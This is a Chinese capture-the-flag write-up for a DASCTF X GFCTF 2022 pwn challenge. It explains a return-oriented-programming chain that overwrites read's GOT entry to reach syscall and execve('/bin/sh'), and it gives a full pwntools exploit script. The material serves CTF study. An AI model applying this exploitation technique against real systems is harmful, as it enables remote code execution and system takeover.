DASCTF X GFCTF 2022十月挑战赛 - pwn
简单题,自己做了一下发现要比官方wp思路麻烦一点,所以这里就用官方wp的思路
高版本编译出来的,所以没有csu这种万能的gadget,果断看一下汇编
看完之后仔细思考了一下发现这里完全可以使用上面这些gadgets。
仔细看一下会发现可以控制rax,40116D 8B 44 24 0C mov eax, dword ptr [rsp+18h+buf]这里的地方,并且最后还可以控制ret
还有地方:40115A 48 89 C6 mov rsi, rax这里又可以通过rax来控制rsi
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall
这里笔者直接在本地做的就直接打本地了,远程需要爆破一下最后的这个字节
这样的话再调用read的时候就会调用syscall了
这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了
但是程序里没有可以直接控制rdi的,所以我们rop gadget看一下
发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh
rdx在read上面时会被赋值为dword ptr [rsp+18h+buf],所以在写got表的时候将这里设置成指向0的地址即可
from pwn import *
from time import sleep
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 0
if debug:
r = remote('node4.buuoj.cn', 29736)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
r.send(p32(0x100))
bss_addr = 0x404018
# mov eax, dword ptr [rsp+18h+buf]; add rsp, 18h; retn
mov_rax_rsp_add_rsp = 0x40116D
call_read = 0x40115A
mov_rdi_404018_jump_rax = 0x0000000000401099
read_got = elf.got['read']
ret = 0x401175
lea_rsi = 0x401141
p1 = b'a' * 0x10 + p64(mov_rax_rsp_add_rsp) + p64(0) + p32(0) + p32(bss_addr) + p64(0) + p64(call_read)
p1 += p64(0) + p32(0) + p32(read_got) + p64(0) + p64(call_read)
p1 += p64(0) + p32(0) + p32(bss_addr + 8) + p64(0) + p64(mov_rax_rsp_add_rsp)
p1 += p64(0) + p32(0) + p32(ret) + p64(0) + p64(mov_rdi_404018_jump_rax)
p1 += p64(mov_rax_rsp_add_rsp) + p64(0) + p32(0) + p32(0x3b) + p64(0) + p64(lea_rsi)
p1 += p64(0) + p32(0) + p32(0) + p64(0)
r.send(p1)
r.send('/bin/sh\x00')
r.send('\x60')
r.interactive()
1095
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
